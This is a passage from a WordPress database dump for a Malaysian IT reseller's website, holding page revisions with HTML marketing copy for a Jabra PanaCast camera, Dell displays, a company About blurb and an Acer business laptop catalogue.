07:58:44','',3074,'https://bintara.com.my/blog/2019/07/27/3074-revision-v1/',0,'revision','',0),(3079,1,'2019-07-27 16:00:51','2019-07-27 08:00:51','The Jabra PanaCast is a plug-and-play device, designed to improve meetings in huddle rooms by using three 13-megapixel cameras and real-time video stitching to give a full 180Â° view. Enjoy a natural, inclusive human perspective, with no blind spots.','Jabra PanaCast','Engineered to be the worldâ€™s first intelligent 180Â° Panoramic 4K plug-and-play video solution.','inherit','closed','closed','','jabra-panacast-2','','','2019-07-27 16:02:11','2019-07-27 08:02:11','',3074,'https://bintara.com.my/wp-content/uploads/2019/07/Jabra-PanaCast.jpg',0,'attachment','image/jpeg',0),(3080,1,'2019-07-27 16:02:20','2019-07-27 08:02:20','<h1 class=\"ng-scope\">Jabra PanaCast</h1>\r\n<h4 class=\"ng-binding ng-scope\">Engineered to be the worldâ€™s first intelligent 180Â° Panoramic 4K plug-and-play video solution.</h4>\r\n&nbsp;\r\n\r\n<img src=\"https://www.apac.jabra.com/-/media/Images/Products/Jabra-Panacast/V2/TopBanner/PanaTop.png?la=en-APAC&amp;hash=870A3D4C32FE2ACAE2F72AE17FA9A6BC822DEC69\" />\r\n<p style=\"text-align: center;\">[maxbutton id=\"1\" text=\"Contact Sales\" ]</p>\r\n&nbsp;\r\n\r\n&nbsp;','Jabra PanaCast','','inherit','closed','closed','','3074-revision-v1','','','2019-07-27 16:02:20','2019-07-27 08:02:20','',3074,'https://bintara.com.my/blog/2019/07/27/3074-revision-v1/',0,'revision','',0),(3081,1,'2019-07-27 16:13:17','2019-07-27 08:13:17','Huddle comfortably. PanaCast delivers a natural collaboration experience especially in the smallest of spaces.','Jabra PanaCast HuddleRoom','Jabra PanaCast HuddleRoom','inherit','closed','closed','','panacast_huddleroom','','','2019-07-27 16:14:14','2019-07-27 08:14:14','',3074,'https://bintara.com.my/wp-content/uploads/2019/07/PanaCast_HuddleRoom.jpg',0,'attachment','image/jpeg',0),(3082,1,'2019-07-27 16:17:38','2019-07-27 08:17:38','<h1>Jabra PanaCast</h1>\n<h4>Engineered to be the worldâ€™s first intelligent 180Â° Panoramic 4K plug-and-play video solution.</h4>\n&nbsp;\n<img src=\"https://www.apac.jabra.com/-/media/Images/Products/Jabra-Panacast/V2/TopBanner/PanaTop.png?la=en-APAC&amp;hash=870A3D4C32FE2ACAE2F72AE17FA9A6BC822DEC69\" />\n<p style=\"text-align: center;\">[maxbutton id=\"1\" text=\"Contact Sales\" ]</p>\n&nbsp;\n&nbsp;		\n										<img width=\"800\" height=\"541\" src=\"https://bintara.com.my/wp-content/uploads/2019/07/PanaCast_HuddleRoom-1024x693.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2019/07/PanaCast_HuddleRoom-1024x693.jpg 1024w, https://bintara.com.my/wp-content/uploads/2019/07/PanaCast_HuddleRoom-300x203.jpg 300w, https://bintara.com.my/wp-content/uploads/2019/07/PanaCast_HuddleRoom-768x520.jpg 768w\" sizes=\"(max-width: 800px) 100vw, 800px\" />											\n		<h2>Perfect for small meeting rooms</h2><p>The Jabra PanaCast is a plug-and-play device, designed to improve meetings in huddle rooms by using three 13-megapixel cameras and real-time video stitching to give a full 180Â° view. Enjoy a natural, inclusive human perspective, with no blind spots.</p><h1>Inclusive</h1><h2>Unique, real-time video stitching for a natural 180Â° view</h2><p>Enhance your huddle room with Panoramic 4K video. The Jabra PanaCast uses three 13-megapixel cameras and patented real-time video stitching to give a full 180Â° view of the room. Enjoy a natural, human perspective, with no blind spots.</p>','Jabra PanaCast','','inherit','closed','closed','','3074-revision-v1','','','2019-07-27 16:17:38','2019-07-27 08:17:38','',3074,'https://bintara.com.my/blog/2019/07/27/3074-revision-v1/',0,'revision','',0),(3083,1,'2019-07-27 16:20:30','2019-07-27 08:20:30','<h1>Jabra PanaCast</h1>\n<h4>Engineered to be the worldâ€™s first intelligent 180Â° Panoramic 4K plug-and-play video solution.</h4>\n&nbsp;\n<img src=\"https://www.apac.jabra.com/-/media/Images/Products/Jabra-Panacast/V2/TopBanner/PanaTop.png?la=en-APAC&amp;hash=870A3D4C32FE2ACAE2F72AE17FA9A6BC822DEC69\" />\n<p style=\"text-align: center;\">[maxbutton id=\"1\" text=\"Contact Sales\" ]</p>\n&nbsp;\n&nbsp;		\n										<img width=\"800\" height=\"541\" src=\"https://bintara.com.my/wp-content/uploads/2019/07/PanaCast_HuddleRoom-1024x693.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2019/07/PanaCast_HuddleRoom-1024x693.jpg 1024w, https://bintara.com.my/wp-content/uploads/2019/07/PanaCast_HuddleRoom-300x203.jpg 300w, https://bintara.com.my/wp-content/uploads/2019/07/PanaCast_HuddleRoom-768x520.jpg 768w\" sizes=\"(max-width: 800px) 100vw, 800px\" />											\n		<h2>Perfect for small meeting rooms</h2><p>The Jabra PanaCast is a plug-and-play device, designed to improve meetings in huddle rooms by using three 13-megapixel cameras and real-time video stitching to give a full 180Â° view. Enjoy a natural, inclusive human perspective, with no blind spots.</p><h1>Inclusive</h1><h2>Unique, real-time video stitching for a natural 180Â° view</h2><p>Enhance your huddle room with Panoramic 4K video. The Jabra PanaCast uses three 13-megapixel cameras and patented real-time video stitching to give a full 180Â° view of the room. Enjoy a natural, human perspective, with no blind spots.</p><h1>Contact sales</h1><h4>Our team of product experts can help you find the best solution for your company. Get instant pricing and advice for your specific environment and use. Fill out the form and a BINTARA representative will contact you.</h4>[maxbutton id=\"1\" text=\"Contact Sales\" ]Â ','Jabra PanaCast','','inherit','closed','closed','','3074-revision-v1','','','2019-07-27 16:20:30','2019-07-27 08:20:30','',3074,'https://bintara.com.my/blog/2019/07/27/3074-revision-v1/',0,'revision','',0),(3084,1,'2019-07-27 16:21:17','2019-07-27 08:21:17','<h1>Jabra PanaCast</h1>\r\n<h4>Engineered to be the worldâ€™s first intelligent 180Â° Panoramic 4K plug-and-play video solution.</h4>\r\n<img src=\"https://www.apac.jabra.com/-/media/Images/Products/Jabra-Panacast/V2/TopBanner/PanaTop.png?la=en-APAC&amp;hash=870A3D4C32FE2ACAE2F72AE17FA9A6BC822DEC69\" />\r\n<p style=\"text-align: center;\">[maxbutton id=\"1\" text=\"Contact Sales\" ]</p>\r\n\r\n\r\n<img src=\"https://bintara.com.my/wp-content/uploads/2019/07/PanaCast_HuddleRoom-1024x693.jpg\" sizes=\"(max-width: 800px) 100vw, 800px\" srcset=\"https://bintara.com.my/wp-content/uploads/2019/07/PanaCast_HuddleRoom-1024x693.jpg 1024w, https://bintara.com.my/wp-content/uploads/2019/07/PanaCast_HuddleRoom-300x203.jpg 300w, https://bintara.com.my/wp-content/uploads/2019/07/PanaCast_HuddleRoom-768x520.jpg 768w\" alt=\"\" width=\"800\" height=\"541\" />\r\n<h2>Perfect for small meeting rooms</h2>\r\nThe Jabra PanaCast is a plug-and-play device, designed to improve meetings in huddle rooms by using three 13-megapixel cameras and real-time video stitching to give a full 180Â° view. Enjoy a natural, inclusive human perspective, with no blind spots.\r\n<h1>Inclusive</h1>\r\n<h2>Unique, real-time video stitching for a natural 180Â° view</h2>\r\nEnhance your huddle room with Panoramic 4K video. The Jabra PanaCast uses three 13-megapixel cameras and patented real-time video stitching to give a full 180Â° view of the room. Enjoy a natural, human perspective, with no blind spots.\r\n<h1>Contact sales</h1>\r\n<h4>Our team of product experts can help you find the best solution for your company. Get instant pricing and advice for your specific environment and use. Fill out the form and a BINTARA representative will contact you.</h4>\r\n[maxbutton id=\"1\" text=\"Contact Sales\" ]','Jabra PanaCast','','inherit','closed','closed','','3074-revision-v1','','','2019-07-27 16:21:17','2019-07-27 08:21:17','',3074,'https://bintara.com.my/blog/2019/07/27/3074-revision-v1/',0,'revision','',0),(3085,1,'2019-07-27 16:21:32','2019-07-27 08:21:32','<h1>Jabra PanaCast</h1>\r\n<h4>Engineered to be the worldâ€™s first intelligent 180Â° Panoramic 4K plug-and-play video solution.</h4>\r\n<img src=\"https://www.apac.jabra.com/-/media/Images/Products/Jabra-Panacast/V2/TopBanner/PanaTop.png?la=en-APAC&amp;hash=870A3D4C32FE2ACAE2F72AE17FA9A6BC822DEC69\" />\r\n<p style=\"text-align: center;\">[maxbutton id=\"1\" text=\"Contact Sales\" ]</p>\r\n<img src=\"https://bintara.com.my/wp-content/uploads/2019/07/PanaCast_HuddleRoom-1024x693.jpg\" sizes=\"(max-width: 800px) 100vw, 800px\" srcset=\"https://bintara.com.my/wp-content/uploads/2019/07/PanaCast_HuddleRoom-1024x693.jpg 1024w, https://bintara.com.my/wp-content/uploads/2019/07/PanaCast_HuddleRoom-300x203.jpg 300w, https://bintara.com.my/wp-content/uploads/2019/07/PanaCast_HuddleRoom-768x520.jpg 768w\" alt=\"\" width=\"800\" height=\"541\" />\r\n<h2>Perfect for small meeting rooms</h2>\r\nThe Jabra PanaCast is a plug-and-play device, designed to improve meetings in huddle rooms by using three 13-megapixel cameras and real-time video stitching to give a full 180Â° view. Enjoy a natural, inclusive human perspective, with no blind spots.\r\n<h1>Inclusive</h1>\r\n<h2>Unique, real-time video stitching for a natural 180Â° view</h2>\r\nEnhance your huddle room with Panoramic 4K video. The Jabra PanaCast uses three 13-megapixel cameras and patented real-time video stitching to give a full 180Â° view of the room. Enjoy a natural, human perspective, with no blind spots.\r\n<h1>Contact sales</h1>\r\n<h4>Our team of product experts can help you find the best solution for your company. Get instant pricing and advice for your specific environment and use. Fill out the form and a BINTARA representative will contact you.</h4>\r\n<p style=\"text-align: center;\">[maxbutton id=\"1\" text=\"Contact Sales\" ]</p>','Jabra PanaCast','','inherit','closed','closed','','3074-revision-v1','','','2019-07-27 16:21:32','2019-07-27 08:21:32','',3074,'https://bintara.com.my/blog/2019/07/27/3074-revision-v1/',0,'revision','',0),(3087,1,'2019-07-27 16:23:29','2019-07-27 08:23:29','<h1>Jabra PanaCast</h1>\n<h4>Engineered to be the worldâ€™s first intelligent 180Â° Panoramic 4K plug-and-play video solution.</h4>\n&nbsp;\n<img src=\"https://www.apac.jabra.com/-/media/Images/Products/Jabra-Panacast/V2/TopBanner/PanaTop.png?la=en-APAC&amp;hash=870A3D4C32FE2ACAE2F72AE17FA9A6BC822DEC69\" />\n<p style=\"text-align: center;\">[maxbutton id=\"1\" text=\"Contact Sales\" ]</p>\n&nbsp;\n&nbsp;		\n										<img width=\"800\" height=\"541\" src=\"https://bintara.com.my/wp-content/uploads/2019/07/PanaCast_HuddleRoom-1024x693.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2019/07/PanaCast_HuddleRoom-1024x693.jpg 1024w, https://bintara.com.my/wp-content/uploads/2019/07/PanaCast_HuddleRoom-300x203.jpg 300w, https://bintara.com.my/wp-content/uploads/2019/07/PanaCast_HuddleRoom-768x520.jpg 768w\" sizes=\"(max-width: 800px) 100vw, 800px\" />											\n		<h2>Perfect for small meeting rooms</h2><p>The Jabra PanaCast is a plug-and-play device, designed to improve meetings in huddle rooms by using three 13-megapixel cameras and real-time video stitching to give a full 180Â° view. Enjoy a natural, inclusive human perspective, with no blind spots.</p><h1>Inclusive</h1><h2>Unique, real-time video stitching for a natural 180Â° view</h2><p>Enhance your huddle room with Panoramic 4K video. The Jabra PanaCast uses three 13-megapixel cameras and patented real-time video stitching to give a full 180Â° view of the room. Enjoy a natural, human perspective, with no blind spots.</p><h1>Contact sales</h1><h4>Our team of product experts can help you find the best solution for your company. Get instant pricing and advice for your specific environment and use. Fill out the form and a BINTARA representative will contact you.</h4>[maxbutton id=\"1\" text=\"Contact Sales\" ]Â ','Jabra PanaCast','','inherit','closed','closed','','3074-revision-v1','','','2019-07-27 16:23:29','2019-07-27 08:23:29','',3074,'https://bintara.com.my/blog/2019/07/27/3074-revision-v1/',0,'revision','',0),(3088,1,'2019-07-27 16:35:07','2019-07-27 08:35:07','Transform your meeting space with the right Dell Large Format Monitor or Projector. Our products are built to fit different spaces and requirements, and with our open standards approach, you can create a customized end-to-end display solution that is tailored to the way your team members meet','Dell Large Displays','','publish','closed','closed','','dell-large-displays','','','2019-07-29 08:47:27','2019-07-29 00:47:27','',0,'https://bintara.com.my/?page_id=3088',0,'page','',0),(3089,1,'2019-07-27 16:35:07','2019-07-27 08:35:07','Transform your meeting space with the right Dell Large Format Monitor or Projector. Our products are built to fit different spaces and requirements, and with our open standards approach, you can create a customized end-to-end display solution that is tailored to the way your team members meet','Dell Large Displays','','inherit','closed','closed','','3088-revision-v1','','','2019-07-27 16:35:07','2019-07-27 08:35:07','',3088,'https://bintara.com.my/blog/2019/07/27/3088-revision-v1/',0,'revision','',0),(3091,1,'2019-09-13 12:24:56','0000-00-00 00:00:00','','Elementor #3091','','draft','closed','closed','','','','','2019-09-13 12:24:56','2019-09-13 04:24:56','',0,'https://bintara.com.my/?page_id=3091',0,'page','',0),(3092,1,'2019-09-13 12:24:56','2019-09-13 04:24:56','','Elementor #3091','','inherit','closed','closed','','3091-revision-v1','','','2019-09-13 12:24:56','2019-09-13 04:24:56','',3091,'https://bintara.com.my/blog/2019/09/13/3091-revision-v1/',0,'revision','',0),(3093,1,'2019-09-13 12:53:46','0000-00-00 00:00:00','','Elementor #3093','','draft','closed','closed','','','','','2019-09-13 12:53:46','2019-09-13 04:53:46','',0,'https://bintara.com.my/?page_id=3093',0,'page','',0),(3094,1,'2019-09-13 12:53:46','2019-09-13 04:53:46','','Elementor #3093','','inherit','closed','closed','','3093-revision-v1','','','2019-09-13 12:53:46','2019-09-13 04:53:46','',3093,'https://bintara.com.my/blog/2019/09/13/3093-revision-v1/',0,'revision','',0),(3095,1,'2019-09-13 15:40:51','2019-09-13 07:40:51','<p style=\"text-align: center;\">BINTARA is a multi-brand technology solutions provider to business, government, education and\r\nhealthcare organisations in Malaysia. We help our clients achieve their goals by delivering integrated solutions and services that maximise their technology investment. Thank You</p>','ABOUT','','inherit','closed','closed','','1287-revision-v1','','','2019-09-13 15:40:51','2019-09-13 07:40:51','',1287,'https://bintara.com.my/blog/2019/09/13/1287-revision-v1/',0,'revision','',0),(3096,1,'2019-09-13 15:41:16','2019-09-13 07:41:16','<p style=\"text-align: center;\">BINTARA is a multi-brand technology solutions provider to business, government, education and\r\nhealthcare organisations in Malaysia. We help our clients achieve their goals by delivering integrated solutions and services that maximise their technology investment.</p>','ABOUT','','inherit','closed','closed','','1287-revision-v1','','','2019-09-13 15:41:16','2019-09-13 07:41:16','',1287,'https://bintara.com.my/blog/2019/09/13/1287-revision-v1/',0,'revision','',0),(3100,1,'2019-09-17 17:27:25','2019-09-17 09:27:25','<h3>Business Product Solution</h3>\r\n<h4 class=\"fs-4 align-center margin-top-l\">Swift</h4>\r\n<img class=\"alignnone wp-image-2306 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Swift_7_Ale_preview-300x222.png\" alt=\"\" width=\"300\" height=\"222\" />\r\n\r\n<strong>Swift 7 Pro</strong>\r\n<p class=\"fs-2 align-center text-tertiary-dark margin-bottom-m\">Ultra-thin, stylish and all the power to satisfy your mobile needs.</p>\r\n[maxbutton id=\"7\" ]\r\n<h4></h4>\r\n<h4 class=\"fs-4 align-center margin-top-l\">Spin</h4>\r\n<p class=\"fs-2 align-center text-tertiary-dark margin-bottom-m\">Revolutionary convertible computers that feature powerful innovation and forward-thinking design.</p>\r\n\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td width=\"200\"><img class=\"alignnone wp-image-2307 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Acer-Spin-1-SP111-34N-preview-300x222.png\" alt=\"\" width=\"300\" height=\"222\" />\r\n<p style=\"text-align: center;\">Spin 1</p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"7\" ]</p>\r\n</td>\r\n<td width=\"200\"><img class=\"alignnone wp-image-2308 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/acer-spin-3-SP314-52-gray-preview-300x222.png\" alt=\"\" width=\"300\" height=\"222\" />\r\n<p style=\"text-align: center;\">Spin 3</p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"7\" ]</p>\r\n</td>\r\n<td width=\"200\"><img class=\"alignnone wp-image-2309 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Spin-5-SP515_preview-300x222.png\" alt=\"\" width=\"300\" height=\"222\" />\r\n<p style=\"text-align: center;\">Spin 5 Pro</p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"7\" ]</p>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n&nbsp;\r\n<h4></h4>\r\n<h4 class=\"fs-4 align-center margin-top-l\">Switch</h4>\r\n<p class=\"fs-2 align-center text-tertiary-dark margin-bottom-m\">Perfect blend of a laptop and tablet with modes to fit into every situation.</p>\r\n<img class=\"alignnone wp-image-2310 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Acer_Switch_Alpha_12_SA5-271-preview-300x222.png\" alt=\"\" width=\"300\" height=\"222\" />\r\n\r\nSwitch 12\r\n\r\n[maxbutton id=\"7\" ]\r\n\r\n&nbsp;\r\n<h4 class=\"fs-4 align-center margin-top-l\">Acer Chromebook</h4>\r\n<p class=\"fs-2 align-center text-tertiary-dark margin-bottom-m\">Starts in seconds, thousands of apps, built-in virus protection and all your data saves in the cloud.</p>\r\n\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td width=\"200\"><img class=\"alignnone size-full wp-image-2311\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Acer-Chromebook-Tab-10-D651N-preview.png\" alt=\"\" width=\"474\" height=\"351\" />\r\n<p style=\"text-align: center;\">Acer Chrome Tab 10</p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"7\" ]</p>\r\n</td>\r\n<td width=\"200\"><img class=\"alignnone size-full wp-image-2312\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Chromebook-R-13_preview.png\" alt=\"\" width=\"474\" height=\"351\" />\r\n<p style=\"text-align: center;\">Acer Chromebook R13</p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"7\" ]</p>\r\n</td>\r\n<td width=\"200\"><img class=\"alignnone size-full wp-image-2313\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Chromebook_14-sku-preview.png\" alt=\"\" width=\"338\" height=\"250\" />\r\n<p style=\"text-align: center;\">Acer Chromebook 14</p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"7\" ]</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td width=\"200\"><img class=\"alignnone size-full wp-image-2314\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Acer_CP5-471_black-sku-preview.png\" alt=\"\" width=\"338\" height=\"250\" />\r\n<p style=\"text-align: center;\">Acer Chromebook 14 for Work</p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"7\" ]</p>\r\n</td>\r\n<td width=\"200\"><img class=\"alignnone size-full wp-image-2315\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/C730-nontouch-sku-preview.png\" alt=\"\" width=\"474\" height=\"351\" />\r\n<p style=\"text-align: center;\">Acer Chromebook 11 C730</p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"7\" ]</p>\r\n</td>\r\n<td width=\"200\"><img class=\"alignnone size-full wp-image-2316\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/AcerChromebookR11_C738T_black-sku-preview.png\" alt=\"\" width=\"338\" height=\"250\" />\r\n<p style=\"text-align: center;\">Acer Chromebook R 11 C738T</p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"7\" ]</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td colspan=\"3\" width=\"601\">\r\n<p style=\"text-align: center;\"><img class=\"alignnone wp-image-2317 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Chromebook-11-N7_preview-300x222.png\" alt=\"\" width=\"300\" height=\"222\" /></p>\r\n<p style=\"text-align: center;\">Acer Chromebook 11 N7</p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"7\" ]</p>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n&nbsp;\r\n<h4 class=\"fs-4 align-center margin-top-l\">TravelMate B</h4>\r\n<p class=\"fs-2 align-center text-tertiary-dark margin-bottom-m\">Portable laptops that look great and are great for productivity.</p>\r\n<img class=\"alignnone wp-image-2319 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/TM-Spin-B118_preview-300x222.png\" alt=\"\" width=\"300\" height=\"222\" />\r\n\r\nTravelMate Spin B1\r\n\r\n[maxbutton id=\"7\" ]\r\n\r\n&nbsp;\r\n<h4 class=\"fs-4 align-center margin-top-l\">TravelMate P</h4>\r\n<p class=\"fs-2 align-center text-tertiary-dark margin-bottom-m\">Full-featured business laptops that deliver superior performance, manageability and security features.</p>\r\n\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td width=\"200\"><img class=\"alignnone size-full wp-image-2320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/TravelMate-P246M-sku-preview.png\" alt=\"\" width=\"474\" height=\"351\" />\r\n<p style=\"text-align: center;\">TravelMate P2</p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"7\" ]</p>\r\n</td>\r\n<td width=\"200\"><img class=\"alignnone size-full wp-image-2321\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/TMP4-product-series-preview.png\" alt=\"\" width=\"474\" height=\"351\" />\r\n<p style=\"text-align: center;\">TravelMate P4</p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"7\" ]</p>\r\n</td>\r\n<td width=\"200\"><img class=\"alignnone size-full wp-image-2322\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/TravelMate-P658-preview.png\" alt=\"\" width=\"338\" height=\"250\" />\r\n<p style=\"text-align: center;\">TravelMate P6</p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"7\" ]</p>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>','Acer','','inherit','closed','closed','','1430-revision-v1','','','2019-09-17 17:27:25','2019-09-17 09:27:25','',1430,'https://bintara.com.my/blog/2019/09/17/1430-revision-v1/',0,'revision','',0),(3099,1,'2019-09-17 17:27:04','2019-09-17 09:27:04','<h3>Business Product Solution</h3>\r\n<br><br><br><br><br><br>\r\n<h4 class=\"fs-4 align-center margin-top-l\">Swift</h4>\r\n<img class=\"alignnone wp-image-2306 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Swift_7_Ale_preview-300x222.png\" alt=\"\" width=\"300\" height=\"222\" />\r\n\r\n<strong>Swift 7 Pro</strong>\r\n<p class=\"fs-2 align-center text-tertiary-dark margin-bottom-m\">Ultra-thin, stylish and all the power to satisfy your mobile needs.</p>\r\n[maxbutton id=\"7\" ]\r\n<h4></h4>\r\n<h4 class=\"fs-4 align-center margin-top-l\">Spin</h4>\r\n<p class=\"fs-2 align-center text-tertiary-dark margin-bottom-m\">Revolutionary convertible computers that feature powerful innovation and forward-thinking design.</p>\r\n\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td width=\"200\"><img class=\"alignnone wp-image-2307 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Acer-Spin-1-SP111-34N-preview-300x222.png\" alt=\"\" width=\"300\" height=\"222\" />\r\n<p style=\"text-align: center;\">Spin 1</p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"7\" ]</p>\r\n</td>\r\n<td width=\"200\"><img class=\"alignnone wp-image-2308 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/acer-spin-3-SP314-52-gray-preview-300x222.png\" alt=\"\" width=\"300\" height=\"222\" />\r\n<p style=\"text-align: center;\">Spin 3</p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"7\" ]</p>\r\n</td>\r\n<td width=\"200\"><img class=\"alignnone wp-image-2309 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Spin-5-SP515_preview-300x222.png\" alt=\"\" width=\"300\" height=\"222\" />\r\n<p style=\"text-align: center;\">Spin 5 Pro</p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"7\" ]</p>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n&nbsp;\r\n<h4></h4>\r\n<h4 class=\"fs-4 align-center margin-top-l\">Switch</h4>\r\n<p class=\"fs-2 align-center text-tertiary-dark margin-bottom-m\">Perfect blend of a laptop and tablet with modes to fit into every situation.</p>\r\n<img class=\"alignnone wp-image-2310 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Acer_Switch_Alpha_12_SA5-271-preview-300x222.png\" alt=\"\" width=\"300\" height=\"222\" />\r\n\r\nSwitch 12\r\n\r\n[maxbutton id=\"7\" ]\r\n\r\n&nbsp;\r\n<h4 class=\"fs-4 align-center margin-top-l\">Acer Chromebook</h4>\r\n<p class=\"fs-2 align-center text-tertiary-dark margin-bottom-m\">Starts in seconds, thousands of apps, built-in virus protection and all your data saves in the cloud.</p>\r\n\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td width=\"200\"><img class=\"alignnone size-full wp-image-2311\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Acer-Chromebook-Tab-10-D651N-preview.png\" alt=\"\" width=\"474\" height=\"351\" />\r\n<p style=\"text-align: center;\">Acer Chrome Tab 10</p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"7\" ]</p>\r\n</td>\r\n<td width=\"200\"><img class=\"alignnone size-full wp-image-2312\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Chromebook-R-13_preview.png\" alt=\"\" width=\"474\" height=\"351\" />\r\n<p style=\"text-align: center;\">Acer Chromebook R13</p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"7\" ]</p>\r\n</td>\r\n<td width=\"200\"><img class=\"alignnone size-full wp-image-2313\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Chromebook_14-sku-preview.png\" alt=\"\" width=\"338\" height=\"250\" />\r\n<p style=\"text-align: center;\">Acer Chromebook 14</p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"7\" ]</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td width=\"200\"><img class=\"alignnone size-full wp-image-2314\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Acer_CP5-471_black-sku-preview.png\" alt=\"\" width=\"338\" height=\"250\" />\r\n<p style=\"text-align: center;\">Acer Chromebook 14 for Work</p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"7\" ]</p>\r\n</td>\r\n<td width=\"200\"><img class=\"alignnone size-full wp-image-2315\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/C730-nontouch-sku-preview.png\" alt=\"\" width=\"474\" height=\"351\" />\r\n<p style=\"text-align: center;\">Acer Chromebook 11 C730</p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"7\" ]</p>\r\n</td>\r\n<td width=\"200\"><img class=\"alignnone size-full wp-image-2316\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/AcerChromebookR11_C738T_black-sku-preview.png\" alt=\"\" width=\"338\" height=\"250\" />\r\n<p style=\"text-align: center;\">Acer Chromebook R 11 C738T</p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"7\" ]</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td colspan=\"3\" width=\"601\">\r\n<p style=\"text-align: center;\"><img class=\"alignnone wp-image-2317 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Chromebook-11-N7_preview-300x222.png\" alt=\"\" width=\"300\" height=\"222\" /></p>\r\n<p style=\"text-align: center;\">Acer Chromebook 11 N7</p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"7\" ]</p>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n&nbsp;\r\n<h4 class=\"fs-4 align-center margin-top-l\">TravelMate B</h4>\r\n<p class=\"fs-2 align-center text-tertiary-dark margin-bottom-m\">Portable laptops that look great and are great for productivity.</p>\r\n<img class=\"alignnone wp-image-2319 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/TM-Spin-B118_preview-300x222.png\" alt=\"\" width=\"300\" height=\"222\" />\r\n\r\nTravelMate Spin B1\r\n\r\n[maxbutton id=\"7\" ]\r\n\r\n&nbsp;\r\n<h4 class=\"fs-4 align-center margin-top-l\">TravelMate P</h4>\r\n<p class=\"fs-2 align-center text-tertiary-dark margin-bottom-m\">Full-featured business laptops that deliver superior performance, manageability and security features.</p>\r\n\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td width=\"200\"><img class=\"alignnone size-full wp-image-2320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/TravelMate-P246M-sku-preview.png\" alt=\"\" width=\"474\" height=\"351\" />\r\n<p style=\"text-align: center;\">TravelMate P2</p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"7\" ]</p>\r\n</td>\r\n<td width=\"200\"><img class=\"alignnone size-full wp-image-2321\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/TMP4-product-series-preview.png\" alt=\"\" width=\"474\" height=\"351\" />\r\n<p style=\"text-align: center;\">TravelMate P4</p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"7\" ]</p>\r\n</td>\r\n<td width=\"200\"><img class=\"alignnone size-full wp-image-2322\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/TravelMate-P658-preview.png\" alt=\"\" width=\"338\" height=\"250\" />\r\n<p style=\"text-align: center;\">TravelMate P6</p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"7\" ]</p>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>','Acer','','inherit','closed','closed','','1430-revision-v1','','','2019-09-17 17:27:04','2019-09-17 09:27:04','',1430,'https://bintara.com.my/blog/2019/09/17/1430-revision-v1/',0,'revision','',0),(3101,1,'2019-09-17 17:28:23','2019-09-17 09:28:23','<h3>Business Product 